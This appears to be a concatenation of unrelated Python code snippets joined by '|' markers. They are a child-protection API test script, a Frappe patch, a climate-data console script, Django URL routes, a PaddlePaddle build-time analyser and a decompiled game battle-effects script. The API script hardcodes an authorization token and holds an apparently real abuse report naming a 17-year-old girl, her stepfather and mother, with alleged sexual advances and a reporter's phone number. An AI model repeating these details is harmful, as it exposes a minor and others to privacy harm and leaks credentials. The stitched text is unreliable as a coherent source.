If the sum is divisable by 7, also print the word "Boom"
"""
|
# from django.test import TestCase
import requests
# from django.utils.timezone import utc
# Create your tests here.
# default=datetime.datetime(2019, 8, 23, 17, 59, 40, 153036, tzinfo=utc)
url = 'http://localhost:8004/api/v1/crs/'
# url = 'https://test.cpims.net/api/v1/crs/'
# url = 'http://childprotection.go.ke/api/v1/crs/'
headers = {'Authorization': 'Token 330764ede3eb59acca76b8f064b84eb477ff452e'}
data = {"county": "001", "constituency": "001", "case_category": "CDIS",
"child_dob": "2010-06-15", "perpetrator": "PKNW",
"child_first_name": "Susan", "child_surname": "Atieno",
"case_landmark": "Near kiroboto primary",
"case_narration": "Child was abducted", "child_sex": "SMAL",
"reporter_first_name": "Mark", "reporter_surname": "Masai",
"reporter_telephone": "254722166058",
"reporter_county": "001", "reporter_sub_county": "001",
"case_reporter": "CRSF", "organization_unit": "Helpline",
"hh_economic_status": "UINC", "family_status": "FSUK",
"mental_condition": "MNRM", "physical_condition": "PNRM",
"other_condition": "CHNM", "risk_level": "RLMD",
"case_date": "2019-10-14",
"perpetrators": [{"relationship": "RCPT", "first_name": "James",
"surname": "Kamau", "sex": "SMAL"}],
"caregivers": [{"relationship": "CGPM", "first_name": "Mama",
"surname": "Atieno", "sex": "SMAL"}],
"case_details": [{'category': 'CIDS',
'place_of_event': 'PEHF',
'date_of_event': '2019-09-01',
'nature_of_event': 'OOEV'}]}
data = {'hh_economic_status': 'UINC', 'child_sex': 'SFEM', 'case_reporter': 'CRSF', 'physical_condition': 'no', 'case_date': '2020-09-13', 'reporter_first_name': 'Leonard', 'county': '047', 'reporter_county': '047', 'reporter_surname': 'mbugua', 'perpetrators': [{'first_name': '', 'surname': '', 'relationship': '', 'sex': 'SMAL'}], 'other_condition': 'CHNM', 'risk_level': 'RLMD', 'perpetrator': 'PKNW', 'mental_condition': 'MNRM', 'family_status': 'FSUK', 'case_narration': u"Leonard mbugua from nairobi county, kasarani sb county in ruai ward called the line with number 704241274 to say her neighbour Tabitha Nyokabi age 17 years has been physically assaulted by her step father Antony wanjohi. her mothers name is Leah wangui. she says sometimes he makes sexual advances towards her. she has tried telling her mother about the incident and all she does is talk to him but does not chase him out of their home. she says she had reported the matter to the police station he was arrested and released on the same day. she was asking for assistance and she was referred to the chiefs office and the children's office", 'organization_unit': 'Helpline', 'caregivers': [{'first_name': 'Leah', 'surname': 'wangui', 'relationship': 'CGPM', 'sex': 'SMAL'}], 'reporter_sub_county': '280', 'case_details': [{'category': 'CSNG', 'place_of_event': 'PEHF', 'date_of_event': '2020-09-13', 'nature_of_event': 'OOEV'}], 'child_surname': 'wangui', 'reporter_telephone': '704241274', 'case_category': 'CSNG', 'case_landmark': 'st john primary', 'child_first_name': 'Leah', 'constituency': '280', 'child_dob': '2020-09-13'}
response = requests.post(url, json=data, headers=headers)
# data = {"case_id": "64d2a692-ef3c-11e9-98c6-d4258b5a3abb"}
# response = requests.get(url, params=data, headers=headers)
# print (response)
print('==' * 50, 'HEADERS', '==' * 50)
print (response.headers)
print ('\n')
print('==' * 50, 'CONTENT', '==' * 50)
print (response.content)
'''
case_id = 'f6e09348-c5d2-11e9-9018-d4258b5a3abb'
response = requests.get(url, params={"case_id": case_id}, headers=headers)
print (response)
print (response.headers)
print (response.content)
'''
|
import frappe
def execute():
try:
frappe.get_doc({
'doctype': 'Letter Head',
'letter_head_name': 'Niyopolymers - Default',
'is_default': 1,
'source': 'Image',
'image': '/assets/niyopolymers/images/niyopolymer_letter_head.png'
}).insert()
frappe.db.commit()
except frappe.DuplicateEntryError:
pass
|
"""Console script for xweights."""
import sys
import dask
from dask.distributed import Client
from .xweights import compute_weighted_means
from ._parser import args
from ._regions import (which_regions,
which_subregions)
def main():
"""Console script for xweights."""
if args.which_regions:
print(which_regions())
return
if args.which_subregions:
print(which_subregions(args.which_subregions))
return
if not args.input_files:
raise TypeError('Please select an input file with the option -i. You can choose between netCDF file(s), directories containing those files and intake-esm catalogue files.')
if not args.region:
raise TypeError('Please select a pre-definded region or a user-given shapefile with the option -r. Use -which_regions to show pre-defined regions and use -which_subregions <region_name> to show subregions of specified pre-defined region.')
weighted_means = compute_weighted_means(args.input_files,
region=args.region,
subregion=args.subregion,
domain_name=args.domain,
time_range=args.time_range,
column_names=args.csv_column_names,
merge_columns=args.merge_columns,
column_merge=args.column_merge,
outdir=args.output_directory,
time_stat=args.time_statistics,
land_only=args.land_only,
**args.kwargs,
)
return 0
if __name__ == "__main__":
with Client() as client:
sys.exit(main())
|
from django.conf.urls import patterns, include, url
from django.contrib import admin
from django.views.generic.base import RedirectView
urlpatterns = patterns(
'',
# Examples:
# url(r'^$', 'webkeeper.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^admin/', include(admin.site.urls)),
url(r'^$', 'common.views.home', name='home'),
url(r'^index$', 'common.views.welcome', name='index'),
url(r'^logout$', 'common.views.logout', name='logout'),
url(r'^ax/login$', 'common.views.login', name='login'),
url(r'^ax/register$', 'common.views.register', name='register'),
url(r'^nc/', include('nc.urls')),
url(r'^tutor/', include('tutor.urls')),
url(r'^tree$', 'common.views.tree', name='tree'),
)
|
# Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
root_path = os.path.abspath(os.path.join(os.getcwd(), ".."))
def strToSecond(strTime):
minute = int(strTime.split(':')[0])
second = int(strTime.split(':')[1].split('.')[0]) + 1
return minute * 60 + second
def getUsefulBuildTimeFile(filename):
os.system(
"grep -Po -- '-o .*' %s | grep ' elapsed' | grep -P -v '0:00.* elapse' > %s/tools/analysis_build_time"
% (filename, root_path))
os.system(
"grep -v -- '-o .*' %s |grep ' elapse' | grep -P -v '0:00.* elapse' >> %s/tools/analysis_build_time"
% (filename, root_path))
def analysisBuildTime():
filename = '%s/build/build-time' % root_path
getUsefulBuildTimeFile(filename)
os.system('rm -rf %s/tools/tempbuildTime.txt' % root_path)
with open('%s/tools/analysis_build_time' % root_path, 'r') as f:
lines = f.readlines()
for line in lines:
try:
line = line.strip()
if '-o ' in line:
buildFile = line.split(', ')[0].split(' ')[1]
buildTime = line.split(', ')[1].split('elapsed')[0].strip()
secondTime = strToSecond(buildTime)
os.system("echo %s, %s >> %s/tools/tempbuildTime.txt" %
(buildFile, secondTime, root_path))
else:
buildTime = line.split(', ')[1].split('elapsed')[0].strip()
secondTime = strToSecond(buildTime)
if secondTime > 30:
os.system("echo %s, %s >> %s/tools/tempbuildTime.txt" %
(line, secondTime, root_path))
except ValueError:
print(line)
os.system(
'sort -n -k 2 -r %s/tools/tempbuildTime.txt > %s/tools/buildTime.txt' %
(root_path, root_path))
analysisBuildTime()
|
from ActionHelper import *
def main():
CreateArtsAction("as90000.dat")
CraftAction((
"移动", # 00 0
"移动", # 01 1
"移动", # 02 2
"移动", # 03 3
"移动", # 04 4
"移动", # 05 5
"移动", # 06 6
"移动", # 07 7
"移动", # 08 8
"移动", # 09 9
"石之芒", # 0A 10
"地震波", # 0B 11
"石化之息", # 0C 12
"大地之矛", # 0D 13
"世界之树", # 0E 14
"巨神狂怒震", # 0F 15
"Craft_10_16_BE5", # 10 16
"Craft_11_17_D69", # 11 17
"防壁之符文", # 12 18
"防壁之符文", # 13 19
"冰之刃", # 14 20
"冰蓝之泪", # 15 21
"冰之锤", # 16 22
"水流轰击", # 17 23
"钻石星尘", # 18 24
"大海啸", # 19 25
"灭世冥寒灾", # 1A 26
"Craft_1B_27_1832", # 1B 27
"慈爱之符文", # 1C 28
"慈爱之符文", # 1D 29
"火之矢", # 1E 30
"灼热之波", # 1F 31
"熔岩之息", # 20 32
"炎蝶之舞", # 21 33
"赤红射线", # 22 34
"龙皇炼狱火", # 23 35
"Craft_24_36_2131", # 24 36
"Craft_25_37_2132", # 25 37
"胜利之符文", # 26 38
"胜利之符文", # 27 39
"雷电击", # 28 40
"风之镰", # 29 41
"风之领域", # 2A 42
"闪电之力", # 2B 43
"雷光龙卷", # 2C 44
"终焉三重奏", # 2D 45
"Craft_2E_46_29DE", # 2E 46
"Craft_2F_47_29DF", # 2F 47
"暴风之符文", # 30 48
"暴风之符文", # 31 49
"心灵之霞", # 32 50
"死亡螺旋", # 33 51
"暗影裁决", # 34 52
"灾厄镰刃", # 35 53
"堕天使暗翼", # 36 54
"Craft_37_55_3063", # 37 55
"Craft_38_56_3064", # 38 56
"Craft_39_57_3065", # 39 57
"刹那之符文", # 3A 58
"刹那之符文", # 3B 59
"暗物质", # 3C 60
"光子飞射", # 3D 61
"大灾变", # 3E 62
"金耀辉环", # 3F 63
"天劫轮回光", # 40 64
"Craft_41_65_3AF5", # 41 65
"Craft_42_66_3AF6", # 42 66
"Craft_43_67_3AF7", # 43 67
"震天之符文", # 44 68
"震天之符文", # 45 69
"混沌烙印", # 46 70
"幻影之塔", # 47 71
"天国之门", # 48 72
"银色荆刺", # 49 73
"幻银方舟炮", # 4A 74
"Craft_4B_75_4774", # 4B 75
"Craft_4C_76_4775", # 4C 76
"Craft_4D_77_4776", # 4D 77
"幻影之符文", # 4E 78
"幻影之符文", # 4F 79
"大地治愈", # 50 80
"结晶防护", # 51 81
"结晶防护·复", # 52 82
"坚韧守护", # 53 83
"Craft_54_84_499B", # 54 84
"Craft_55_85_499C", # 55 85
"Craft_56_86_499D", # 56 86
"Craft_57_87_499E", # 57 87
"强音之力", # 58 88
"强音之力·复", # 59 89
"振奋之激", # 5A 90
"Craft_5B_91_4B0C", # 5B 91
"Craft_5C_92_4B0D", # 5C 92
"Craft_5D_93_4B0E", # 5D 93
"Craft_5E_94_4B0F", # 5E 94
"Craft_5F_95_4B10", # 5F 95
"生命之息", # 60 96
"圣灵之息", # 61 97
"风之精灵", # 62 98
"大治愈术", # 63 99
"精灵之歌", # 64 100
"Craft_65_101_4FBD", # 65 101
"Craft_66_102_4FBE", # 66 102
"Craft_67_103_4FBF", # 67 103
"时间减速", # 68 104
"时间驱动", # 69 105
"灾厄之爪", # 6A 106
"Craft_6B_107_51E1", # 6B 107
"Craft_6C_108_51E2", # 6C 108
"Craft_6D_109_51E3", # 6D 109
"Craft_6E_110_51E4", # 6E 110
"Craft_6F_111_51E5", # 6F 111
"魔导祝福", # 70 112
"A-反射屏障", # 71 113
"圣灵苏生", # 72 114
"纯净弧光", # 73 115
"Craft_74_116_5520", # 74 116
"Craft_75_117_5521", # 75 117
"Craft_76_118_5522", # 76 118
"Craft_77_119_5523", # 77 119
"神圣祝福", # 78 120
"虚空幻域", # 79 121
"狂乱之月", # 7A 122
"星之守护", # 7B 123
"情报解析", # 7C 124
"Craft_7D_125_58A0", # 7D 125
"Craft_7E_126_58A1", # 7E 126
"Craft_7F_127_58A2", # 7F 127
"回复术", # 80 128
"中回复术", # 81 129
"大回复术", # 82 130
"水之幻影", # 83 131
"封魔领域", # 84 132
"中复苏术", # 85 133
"复苏术", # 86 134
"全回复术", # 87 135
"Craft_88_136_5CC0", # 88 136
"Craft_88_136_5CC0", # 89 137
"Craft_88_136_5CC0", # 8A 138
"Craft_88_136_5CC0", # 8B 139
))
def Craft_移动(): pass
label("移动")
Return()
# 移动 end
def Craft_石之芒(): pass
label("石之芒")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg010_00.eff")
AS_78(0)
Sleep(125)
Yield()
LockCamera(0xFE, 0, 0, 0, 600)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(750)
Yield()
DamageAnime(0xFE, 0x0, 0x32)
DamageCue(0xFE)
AS_14(0x0)
Call("loc_1D5")
Return()
label("loc_1D5")
FreeEffect(0x0)
FreeEffect(0x1)
FreeEffect(0x2)
FreeEffect(0x3)
FreeEffect(0x4)
FreeEffect(0x5)
FreeEffect(0x6)
FreeEffect(0x7)
CallReturn()
# 石之芒 end
def Craft_地震波(): pass
label("地震波")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg011_00.eff")
LoadEffect(0x1, "battle\\mg010_01.eff")
AS_78(0)
LockCamera(0xFE, 0, 0, 0, 500)
Sleep(500)
Yield()
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(1000)
Yield()
BeginChrThread(0xFF, 3, "loc_37", 0x0)
Sleep(600)
Yield()
BeginChrThread(0xFF, 3, "loc_37", 0x0)
Sleep(500)
Yield()
BeginChrThread(0xFF, 3, "loc_37", 0x0)
Sleep(500)
Yield()
BeginChrThread(0xFF, 3, "loc_37", 0x0)
Sleep(500)
Yield()
BeginChrThread(0xFF, 3, "loc_37", 0x0)
Sleep(250)
Yield()
EndChrThread(0xFF, 3)
ResetTarget()
label("loc_2E5")
ForeachTarget("loc_30E")
PlayEffect(0xFF, 0xF8, 0x1, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(100)
Yield()
NextTarget()
Jump("loc_2E5")
label("loc_37")
ResetTarget()
label("loc_38")
ForeachTarget("loc_47")
DamageAnime(0xFE, 0x0, 0x32)
Sleep(50)
Yield()
NextTarget()
Jump("loc_38")
label("loc_47")
Return()
label("loc_30E")
Call("loc_2")
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
Return()
label("loc_2")
ResetTarget()
label("loc_3")
ForeachTarget("loc_14")
DamageAnime(0xFE, 0x0, 0x32)
DamageCue(0xFE)
Sleep(50)
Yield()
NextTarget()
Jump("loc_3")
label("loc_14")
CallReturn()
# 地震波 end
def Craft_石化之息(): pass
label("石化之息")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg012_00.eff")
LoadEffect(0x1, "battle\\mg012_01.eff")
AS_78(0)
Sleep(300)
Yield()
LockCamera(0xFE, 0, 0, 0, 600)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
AS_3D(100, 100, 100, 200)
Sleep(1200)
Yield()
LockCamera(0xFE, 0, 800, 0, 2000)
AS_B0(0x1E, 0x7D0)
Sleep(2400)
Yield()
AS_31(0x17, 0x1F4)
Sleep(600)
Yield()
label("loc_3AE")
ForeachTarget("loc_3D3")
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
NextTarget()
Jump("loc_3AE")
label("loc_3D3")
Call("loc_2")
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
Return()
# 石化之息 end
def Craft_大地之矛(): pass
label("大地之矛")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg013_00.eff")
AS_78(0)
Sleep(300)
Yield()
SetBrightness(0x0, 0x0, 300)
Fade(0x1, 500, 0x0)
AS_60(0xF7)
AS_5F(0xFC, 0x0)
AS_5F(0xFF, 0x0)
AS_31(0x11, 0x0)
AS_3A(0xFF92, 0x0)
ResetLookingTargetData()
LookingTargetAdd(0xFC, "", 0x0)
LookingTargetAdd(0xFF, "", 0x0)
LookingTarget(300, 28, 20)
AS_B0(0x14, 0x0)
Sleep(500)
Yield()
AS_3D(100, 100, 100, 500)
BlurSwitch(0x1F4, 0xBBFFFFFF, 0x0, 0x0, 0x1)
PlayEffect(0xFF, 0xFF, 0x0, 0x4, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, 4)
SetCameraDistance(23000, 600)
AS_3D(300, 300, 300, 500)
Sleep(400)
Yield()
AS_B0(0x1E, 0x320)
AS_3A(0xFFF6, 0x3E8)
Sleep(200)
Yield()
AS_3D(200, 200, 200, 1300)
CancelBlur(300)
Sleep(1200)
Yield()
SetCameraDistance(21000, 100)
Sleep(500)
Yield()
SetCameraDistance(24000, 600)
AS_3D(600, 600, 600, 800)
Sleep(500)
Yield()
Sleep(400)
Yield()
ResetBrightness(500)
ResetLookingTargetData()
LookingTargetAdd(0xFC, "", 0x0)
LookingTarget(300, 20, 30)
Sleep(500)
Yield()
ResetTarget()
AS_83(0x0)
label("loc_4CE")
ForeachTarget("loc_4DF")
DamageAnime(0xFE, 0x0, 0x32)
DamageCue(0xFE)
Sleep(30)
Yield()
NextTarget()
Jump("loc_4CE")
label("loc_4DF")
WaitChrThread(0xFF, 1)
SetBrightness(0x0, 0x1, 0)
WaitEffect(0xFF, 0x4)
FreeEffect(0x0)
AS_8F(0x0)
Fade(0x1, 300, 0x0)
AS_5F(0xF7, 0x1)
AS_31(0x17, 0x0)
Call("loc_1D5")
Return()
# 大地之矛 end
def Craft_世界之树(): pass
label("世界之树")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg014_00.eff")
LoadEffect(0x1, "battle\\mg014_01.eff")
LoadEffect(0x2, "battle\\mg014_02.eff")
AS_78(0)
Sleep(300)
Yield()
AS_43(0x0, 0x12C, 0x0)
SetBrightness(0x0, 0x0, 500)
Sleep(300)
Yield()
Fade(0x1, 300, 0x0)
AS_60(0xF7)
LockCamera(0xFB, 0, 0, 0, 0)
SetCameraDistance(35000, 0)
SetCameraDegree(15, 35, 0, 0)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xFB, 0x0, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
LockCamera(0xFB, 0, 12000, -5000, 2500)
Sleep(500)
Yield()
BlurSwitch(0x12C, 0xBBFFFFFF, 0x1, 0x0, 0x0)
SetCameraDistance(48000, 1500)
Sleep(1000)
Yield()
SetCameraDegree(-15, 35, 0, 3000)
Sleep(2500)
Yield()
LockCamera(0xFB, 0, 0, 0, 1000)
AS_B0(0x12, 0x1F4)
SetCameraDistance(25000, 500)
Sleep(500)
Yield()
FreeEffect(0x0)
Fade(0x1, 300, 0x0)
AS_31(0x17, 0x0)
SetCameraDistance(33000, 0)
AS_B0(0x1E, 0x0)
LockCamera(0xFB, 0, 0, 0, 0)
Sleep(200)
Yield()
CancelBlur(500)
ResetBrightness(500)
AS_5F(0xF7, 0x1)
PlayEffect(0xFF, 0xFB, 0x1, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(1800)
Yield()
ResetLookingTargetData()
LookingTargetAdd(0xFC, "", 0x0)
LookingTarget(300, 18, 20)
Sleep(200)
Yield()
ResetTarget()
label("loc_669")
ForeachTarget("loc_692")
PlayEffect(0xFF, 0xFE, 0x2, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(300)
Yield()
NextTarget()
Jump("loc_669")
label("loc_692")
BeginChrThread(0xFF, 3, "loc_2", 0x0)
AS_14(0x0)
AS_14(0x1)
AS_14(0x2)
Call("loc_1D5")
SetBrightness(0x0, 0x1, 0)
WaitChrThread(0xFF, 3)
AS_8F(0x0)
Fade(0x1, 300, 0x0)
AS_31(0x17, 0x0)
Return()
# 世界之树 end
def Craft_巨神狂怒震(): pass
label("巨神狂怒震")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg015_00.eff")
LoadEffect(0x1, "battle\\mg015_01.eff")
LoadEffect(0x2, "battle\\mg015_02.eff")
LoadEffect(0x3, "battle\\mg015_03.eff")
AS_8E(0x1, 0x0, "ef_titan")
AS_8E(0x7, 0x0, 0xFFFFFF, 0x0, 0x0, 0x0)
AS_78(0)
Call("loc_17D")
AS_34()
LockCamera(0xFD, 8200, 1800, -5000, 0)
SetCameraDegree(171, 21, 0, 0)
SetCameraDistance(40000, 0)
SetBattleSpeed(600)
SetCameraDegree(140, 40, 0, 2500)
LockCamera(0xFD, 6800, 3100, -3800, 2500)
SetCameraDistance(20000, 2500)
AS_3D(200, 200, 200, 500)
PlayEffect(0xFF, 0xFD, 0x0, 0x0, 8000, 0, -5000, 0, 0, 0, 800, 800, 800, -1)
Sleep(750)
Yield()
AS_3D(500, 500, 500, 1000)
SetBattleSpeed(1000)
AS_8E(0x5, 0x0, 0xFD, 0x1F40, 0xFFFFFE0C, 0xFFFFEC78)
AS_8E(0xB, 0x0, 0x19A, 0x19A, 0x19A, 0x0)
PlayEffect(0xFF, 0xFD, 0x3, 0x0, 0, 0, 1000, 0, 0, 0, 1000, 1000, 1000, 3)
Sleep(450)
Yield()
AS_8E(0xC, 0x0, 0x1E, 0x0, 0x0, 0x0)
AS_8E(0x7, 0x0, 0xFFFFFFFF, 0x0, 0x0, 0x0)
AS_8E(0x6, 0x0, 0x1, 0x0, 0x0, 0x0)
AS_8E(0x2, 0x0, 0x28, 0x0, 0x0, 0x0)
Sleep(1100)
Yield()
AS_8E(0x6, 0x0, 0x28, 0x0, 0x0, 0x0)
AS_8E(0x2, 0x0, 0xA5, 0x0, 0x0, 0x0)
Sleep(1000)
Yield()
LockCamera(0xFD, 8000, 5500, -4000, 1200)
AS_B0(0x0, 0x9C4)
SetCameraDistance(28000, 800)
Sleep(300)
Yield()
SoundEx(166, 0x0)
Sleep(200)
Yield()
SetCameraDegree(180, -40, 0, 1000)
LockCamera(0xFD, 8600, 2200, -1000, 2500)
Sleep(400)
Yield()
SetCameraDistance(10000, 1500)
SetBattleSpeed(600)
Sleep(400)
Yield()
SoundEx(332, 0x0)
Sleep(600)
Yield()
SetBattleSpeed(250)
Sleep(300)
Yield()
SetBattleSpeed(1000)
SoundEx(200, 0x0)
SetCameraDistance(17000, 600)
AS_B0(0xFFFB, 0x258)
SoundEx(342, 0x0)
BlurSwitch(0x0, 0xBBFFFFFF, 0x0, 0x1, 0xA)
BlurSwitch(0x0, 0xBBFFFFFF, 0x0, 0x1, 0xF)
Sleep(300)
Yield()
SetBattleSpeed(700)
Sleep(1100)
Yield()
SetBattleSpeed(1000)
Fade(0x1, 1000, 0x0)
AS_8E(0x5, 0x0, 0xFD, 0x1F40, 0xFFFFFE0C, 0xFFFFEC78)
AS_8E(0xB, 0x0, 0x1A4, 0x1A4, 0x1A4, 0x0)
AS_8E(0x7, 0x0, 0xFFFFFFFF, 0x0, 0x0, 0x0)
AS_8E(0x6, 0x0, 0xA5, 0x0, 0x0, 0x0)
AS_8E(0x2, 0x0, 0xFF, 0x0, 0x0, 0x0)
CancelBlur(0)
SetBattleSpeed(600)
SoundEx(175, 0x0)
PlayEffect(0xFF, 0xFD, 0x3, 0x0, 0, 0, 0, 0, 0, -12, 1000, 1000, 1000, 4)
AS_1A(0xFF, 0x4, 0x7D0)
LockCamera(0xFD, 8500, 4000, -5200, 0)
SetCameraDegree(100, -10, 0, 0)
SetCameraDistance(20000, 0)
SetCameraDegree(235, -10, 0, 2000)
SetCameraDistance(17500, 2000)
SoundEx(319, 0x0)
Sleep(1450)
Yield()
Play3DEffect(0xFF, 0xEF, "Null_effects", 0x1, 0x1, 0, 0, 0, 0, 0, 0, 1400, 1400, 1400, 5)
SoundEx(339, 0x0)
LockCamera(0xFD, 11400, 2800, -4000, 2800)
SetCameraDegree(210, 0, -10, 2750)
SetCameraDistance(16500, 2750)
SoundEx(273, 0x0)
Sleep(500)
Yield()
SetBattleSpeed(500)
Sleep(1300)
Yield()
AS_3D(600, 600, 600, 1300)
StopEffect(0xFF, 0x4)
StopEffect(0xFF, 0x3)
SetBattleSpeed(1000)
AS_8E(0x5, 0x0, 0xFD, 0x1F40, 0xFFFFFE0C, 0xFFFFEC78)
AS_8E(0xB, 0x0, 0x1C2, 0x1C2, 0x1C2, 0x0)
AS_8E(0x7, 0x0, 0xFFFFFFFF, 0x0, 0x0, 0x0)
AS_8E(0x6, 0x0, 0x100, 0x0, 0x0, 0x0)
AS_8E(0x2, 0x0, 0x12C, 0x0, 0x0, 0x0)
LockCamera(0xFD, 7300, 6000, 14700, 100)
AS_0B(0xFF4C, 0x64)
AS_B0(0xF, 0x64)
SetCameraDistance(5000, 100)
CancelEffect(0xFF, 0x5)
SoundEx(339, 0x0)
PlayEffect(0xFF, 0xFD, 0x3, 0x0, 0, 0, 0, 0, 0, -11, 1000, 1000, 1000, 6)
AS_1A(0xFF, 0x6, 0x12C0)
PlayEffect(0xFF, 0xFD, 0x3, 0x0, 0, 0, 0, 0, 0, -11, 1000, 1000, 1000, 3)
AS_1A(0xFF, 0x3, 0x2710)
AS_5F(0xFC, 0x0)
Sleep(200)
Yield()
PlayEffect(0xFF, 0xFD, 0x2, 0x0, 9600, 0, 10000, 0, 0, 0, 1000, 1000, 1000, -1)
BlurSwitch(0x1F4, 0xBBFFFFFF, 0x1, 0x0, 0x0)
Sleep(600)
Yield()
SetCameraDistance(18000, 500)
LockCamera(0xFD, 7300, 3500, 14700, 500)
AS_3D(800, 800, 800, 500)
Sleep(500)
Yield()
SetBattleSpeed(900)
SetCameraDistance(23000, 1500)
Sleep(300)
Yield()
SoundEx(238, 0x0)
AS_43(0x0, 0x320, 0xFFFFFFFF)
CancelBlur(1000)
Sleep(700)
Yield()
SetBattleSpeed(1000)
BeginChrThread(0xFF, 3, "loc_37", 0x0)
Sleep(1000)
Yield()
EndChrThread(0xFF, 3)
AS_A8(0x0, 0x0)
AS_A8(0x0, 0x1)
AS_A8(0x0, 0x2)
AS_A8(0x0, 0x3)
Call("loc_1D5")
AS_8E(0x4, 0x0, 0x0, 0x0, 0x0, 0x0)
Call("loc_1A3")
Call("loc_1CA")
Return()
label("loc_17D")
AS_43(0x0, 0x1F4, 0xFF000000)
Sleep(500)
Yield()
SetBrightness(0x0, 0x0, 0)
AS_6D(0x20000)
AS_6D(0x40000)
AS_60(0xF7)
Fade(0x0, 500, 0xFF000000)
CallReturn()
label("loc_1A3")
Fade(0x1, 500, 0x0)
AS_7A(0x1)
ShowChr(0xFF, 0)
AS_5F(0xF7, 0x0)
ResetBrightness(0)
SetBrightness(0x0, 0x1, 0)
AS_31(0x17, 0x0)
AS_31(0x3, 0x0)
Call("loc_2")
AS_8F(0x0)
CallReturn()
label("loc_1CA")
AS_6E(0x20000)
AS_6E(0x40000)
CallReturn()
# 巨神狂怒震 end
def Craft_10_16_BE5(): pass
label("Craft_10_16_BE5")
Return()
# Craft_10_16_BE5 end
def Craft_11_17_D69(): pass
label("Craft_11_17_D69")
AS_78(1)
LoadEffect(0x5, "battle\\mg017_00.eff")
LoadEffect(0x6, "battle\\mg017_01.eff")
AS_78(0)
LockCamera(0xF3, 0, -1000, 0, 1000)
SetCameraDistance(33000, 1000)
Sleep(500)
Yield()
PlayEffect(0xFF, 0xF3, 0x6, 0x0, 0, 100, 0, 0, 0, 0, 1000, 1000, 1000, -1)
SoundEx(278, 0x0)
Call("loc_CEF")
ResetTarget()
label("loc_DDA")
ForeachTarget("loc_E06")
PlayEffect(0xFF, 0xFE, 0x5, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Call("loc_CEF")
Sleep(250)
Yield()
NextTarget()
Jump("loc_DDA")
label("loc_CEF")
Jc(0x15, 0x1, 0x11, "loc_D02")
SetEffectColor(0xFF, 129, 0xFF834A2C)
Jump("loc_D68")
label("loc_D02")
Jc(0x15, 0x1, 0x1B, "loc_D15")
SetEffectColor(0xFF, 129, 0xFF5375E8)
Jump("loc_D68")
label("loc_D15")
Jc(0x15, 0x1, 0x25, "loc_D28")
SetEffectColor(0xFF, 129, 0xFFFF673C)
Jump("loc_D68")
label("loc_D28")
Jc(0x15, 0x1, 0x2F, "loc_D3B")
SetEffectColor(0xFF, 129, 0xFF5AE09A)
Jump("loc_D68")
label("loc_D3B")
Jc(0x15, 0x1, 0x39, "loc_D4E")
SetEffectColor(0xFF, 129, 0xFFCB52A7)
Jump("loc_D68")
label("loc_D4E")
Jc(0x15, 0x1, 0x43, "loc_D61")
SetEffectColor(0xFF, 129, 0xFFB4A94E)
Jump("loc_D68")
label("loc_D61")
SetEffectColor(0xFF, 129, 0xFF8E8EA6)
label("loc_D68")
CallReturn()
label("loc_E06")
Sleep(1000)
Yield()
Call("loc_15")
Sleep(1000)
Yield()
AS_14(0x5)
AS_14(0x6)
Call("loc_1D5")
Return()
label("loc_15")
ResetTarget()
label("loc_16")
ForeachTarget("loc_23")
DamageCue(0xFE)
Sleep(50)
Yield()
NextTarget()
Jump("loc_16")
label("loc_23")
CallReturn()
# Craft_11_17_D69 end
def Craft_防壁之符文(): pass
label("防壁之符文")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg018_00.eff")
LoadEffect(0x3B, "battle\\mg018_01.eff")
LoadEffect(0x3C, "battle\\mg018_02.eff")
LoadEffect(0x3D, "battle\\mg018_03.eff")
AS_78(0)
Call("loc_17D")
Call("loc_BE6")
Return()
label("loc_BE6")
AS_5F(0xFF, 0x0)
AS_89(0xFF)
ChrSetPos(0xFF, 0xFD, 0, 0, 0)
AS_03(0xFF, 0x0)
SetCameraDegree(150, 20, -7, 0)
AS_3A(0x2F8, 0x1F40)
AS_B0(0x5, 0xFA0)
LockCamera(0xFF, 0, 300, 0, 0)
SetCameraDistance(9000, 0)
SetCameraDistance(20000, 5000)
AS_3E(0x2BC, 0x0)
PlayEffect(0xFF, 0xFF, 0x0, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, 3)
SoundEx(371, 0x0)
SoundEx(223, 0x0)
Fade(0x0, 500, 0xFF000000)
Sleep(1500)
Yield()
LockCamera(0xFF, 0, 2000, 0, 4000)
SoundEx(323, 0x0)
Sleep(600)
Yield()
SoundEx(199, 0x0)
Sleep(1900)
Yield()
SoundEx(211, 0x0)
Sleep(1000)
Yield()
SoundEx(231, 0x0)
Sleep(1000)
Yield()
Sleep(1000)
Yield()
